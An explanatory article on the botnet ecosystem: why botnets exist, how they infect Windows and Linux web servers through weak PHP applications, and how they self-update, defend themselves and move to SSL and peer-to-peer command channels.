The Botnet Ecosystem: Do Botnets Need Windows?
Though Windows exploits are a common enough vector for botnet attacks, not all blame can be placed at Microsoft's feet. The botnet ecosystem claims victims on many platforms.
Botnets exist for two primary reasons.
Executing DDoS attacks, a possibly dying fad, used to be the number one reason. Nowadays spam is king. Spam, of the innocent we-want-to-sell-you-something type, is also dying off, even though it may not seem like it. Legitimate companies have realized that spam is not a marketing tool. Appalled customers finally got the word out on that one, thankfully.
Spam in the form of Nigerian Scams, Phishing attempts, and promotion of illegal products is the main motivation now. Botnets run open proxy servers, not just mail relays, which provide an easy mechanism for spammers. At the same time, botnets are flexible and ready to take on new tasks as well. The use of a massively distributed system of unwitting participants—that's "why."
Attackers infect PCs to install their botnet software, harvest e-mail addresses from your address books, and sometimes even log keystrokes or network traffic. There are secondary motivators, but without people willing to pay bot herders for allowing them to spam, the motivation simply wouldn't be great enough to maintain these systems.
While it is true that most bots run on Windows, and most spam comes from consumer broadband connections, this certainly doesn't mean botnets would perish if Windows suddenly became secure enough to stop them.
Botnet clients have been seen in the wilds running on Unix-based systems, too. The extreme ease with which Windows can get infected, in addition to its market share, is responsible for the fact that most spam originates from compromised Windows machines. Unix systems running a LAMP stack are only as secure as the applications that run on them, which are abysmal. Sloppily written PHP applications have been the bane of many a sysadmin's existence. Within the last few years, the problem has become "why is our Web server spamming?"
That's right, there are tons of Linux machines out there running botnet clients. Before the widespread adoption of botnets, the worst you'd see was a real-live person trying to execute exploits as the user your Web server runs as. Normally they would fail, you'd clean up their entry point, and everything was fine. Contrast that to the Windows world, where any inroad leads to total compromise, and you can easily see the difference in security models.
Regardless of the system compromise level, the damage we're talking about today is done as a normal unprivileged user. A bot client launches, begins running as your Web server user and immediately starts sending spam. The Q8bot and kaiten bots are the most well known bots written explicitly for Unix systems, but countless little Perl scripts also pervade LAMP nightmares.
There is always vulnerable software to be taken advantage of, and the most widespread ones will be taken most often. They aren't necessarily more insecure than the others; they're just more accessible.
Infection and Survival
The initial infection of botnet client machines was done via worms, but soon the botnets began replicating themselves. Most botnets have the ability to self-update. The bot herder will issue an update command, and all his little troops will download and run new versions of themselves. This update mechanism is even more efficient than Windows update, and it's certainly frightening. Some viruses have also been known to disable antivirus software, and most users would never even notice. If a virus can successfully disable all defense mechanisms and then install undetectable bot client software, it's sure to survive.
The botnet itself is also a worm, because many bots have the ability to spread. They will try a fairly large arsenal of exploits against computers on the same network, or possibly even across the Internet. Bot clients updating themselves were primarily used as a mechanism to distribute new exploit code at first, but then something marvelous happened, and the first self-preservation behavior documented occurred recently: bot clients began DDoS'ing any computer that attempted to detect them by scanning.
Botnets have been dubbed "IRC Botnets" in the past, but this isn't completely accurate any longer. Some newfangled botnets still use IRC to communicate, but they do it over SSL. This essentially means that you cannot detect their presence. Furthermore, the old IRC model of "connect to a server" just isn't feasible. A distributed system that's dependent on a single server is useless, especially when that single server is a huge takedown target. Many a botnets were abandoned in the infancy stage of botnet evolution. We could see this with network anomaly detection tools quite easily: clients would appear as a TCP scanner when they unsuccessfully tried connecting to home-base over and over again.
At this point only one thing comes to mind: peer-to-peer applications. P2P networks have successfully thwarted the MPAA/RIAA, so it should work for botnets as well. Especially with their ability to replicate and attack back, they should be unstoppable. Indeed, there have been many reports of p2p botnet activity. Throw SSL in the mix, and they certainly are undetectable and unstoppable.
Let's think about this for a moment. If bots have the ability to self-update, self-preserve, and massively execute large parallel jobs at the command of a single person, what do we really have here? This is not just a tool for spamming and other ills; this is a living, breathing ecosystem.